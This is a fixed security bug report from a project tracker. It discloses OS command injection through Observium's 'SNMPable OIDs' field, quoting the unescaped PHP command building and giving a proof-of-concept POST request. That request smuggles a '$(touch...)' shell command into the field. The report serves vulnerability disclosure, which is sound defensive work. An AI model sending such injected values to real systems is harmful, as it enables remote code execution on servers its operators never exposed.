Uploaded image for project: 'Observium'
  1. Observium
  2. OBS-5242

OS command injection via the "SNMPable OIDs" field (Add Device / Edit Device SNMP)

    XMLWordPrintable

Details

    • Bug
    • Resolution: Fixed
    • Major
    • None
    • CE-22.5
    • Security, Web Interface
    • None

    Description

      Version Tested : Observium CE 26.1.14545
       

          1. Summary
            The "SNMPable OIDs" field on Add Device (and Edit Device -> SNMP) gets fed into a shell command with no escaping at all. Anyone who can reach that field can run arbitrary commands as the web server user.
          1. Details
            `snmp_translate()` in `includes/snmp.inc.php` builds an `snmptranslate` command line. It splits the input on `::` to get a MIB name and an OID (line ~653), then does:

      ```php
      $cmd .= ' -m ' . $mib; // line ~687 - no escaping
      ```

      and later:

      ```php
      $cmd .= ' \'' . $oid . '\''; // line ~698 - hand-rolled quoting, not escapeshellarg()
      ```

      That command then runs through `external_exec()` in `includes/common.inc.php`, which does `proc_open('exec ' . $command, ...)`.

          1. PoC
            Tested against a local Docker copy of the app, logged in as Admin with a valid CSRF token:

      ```
      POST /index.php?_=1
      page=addhost
      submit=save
      hostname=cmdinjtest2.local
      requesttoken=<session csrf token>
      snmp_version=v2c
      snmp_transport=udp
      snmp_community=public
      snmpable=$(touch${IFS}/tmp/pwned_cmdinj_http)::1
      ```

      The app itself just shows "Invalid or unknown OID" error - but inside the container:

      ```
      rw-rr- 1 www-data www-data 0 Jul 7 09:15 /tmp/pwned_cmdinj_http
      ```

      File's there, owned by `www-data` - the web server user. `${IFS}` stands in for a space because the app splits the field on spaces before this ever reaches the vulnerable code; it's not bypassing any security check, just working around that split.
       
      CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H (8.8, High)

          1. Impact
            Remote code execution as the web server (or poller) process. Reachable by a full Admin through Add Device, or by anyone who's been handed write access to a single device through Edit Device.

       


       

      Attachments

        Activity

          People

            landy Mike Stupalov
            tinyb0y tinyb0y
            Votes:
            0 Vote for this issue
            Watchers:
            3 Start watching this issue

            Dates

              Created:
              Updated:
              Resolved: